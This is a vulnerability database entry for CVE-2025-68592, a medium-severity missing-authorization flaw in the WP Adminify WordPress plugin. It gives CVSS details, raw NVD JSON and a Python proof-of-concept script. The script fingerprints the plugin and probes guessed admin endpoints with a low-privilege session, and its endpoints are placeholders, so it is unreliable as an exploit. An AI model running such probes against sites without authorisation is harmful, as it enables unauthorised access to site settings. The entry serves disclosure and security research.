Security Vulnerability Report
中文
CVE-2025-68592 CVSS 4.3 MEDIUM

CVE-2025-68592

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:35

Description

Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Adminify: from n/a through <= 4.0.6.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Adminify <= 4.0.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68592 PoC - WP Adminify Broken Access Control # Description: Missing Authorization in WP Adminify plugin <= 4.0.6.1 # CVSS: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Use a low-privilege user session cookie COOKIES = { "wordpress_logged_in_user_id": "low_privilege_user_id", "wordpress_sec_user_id": "low_privilege_user_sec" } def check_vulnerability(): """Check if WP Adminify plugin is installed and vulnerable""" # Check plugin existence plugin_check = requests.get( f"{TARGET_URL}/wp-content/plugins/adminify/readme.txt", timeout=10 ) if "WP Adminify" not in plugin_check.text: print("[-] WP Adminify plugin not found") return False print("[+] WP Adminify plugin detected") # Try to access admin functionality with low privilege # Replace endpoint with actual vulnerable endpoint from enumeration vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp-adminify/v1/settings", "/wp-json/wp-adminify/v1/options" ] for endpoint in vulnerable_endpoints: try: response = requests.post( f"{TARGET_URL}{endpoint}", cookies=COOKIES, data={"action": "adminify_get_settings"}, timeout=10 ) if response.status_code == 200 and "settings" in response.text.lower(): print(f"[+] Potential vulnerable endpoint found: {endpoint}") print(f"[+] Response preview: {response.text[:200]}") return True except Exception as e: continue print("[-] No obvious vulnerability detected") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-68592 WP Adminify Authorization Bypass PoC") print("=" * 60) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68592", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:26.573", "lastModified": "2026-04-27T19:16:34.787", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Adminify: from n/a through <= 4.0.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/adminify/vulnerability/wordpress-wp-adminify-plugin-4-0-6-1-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}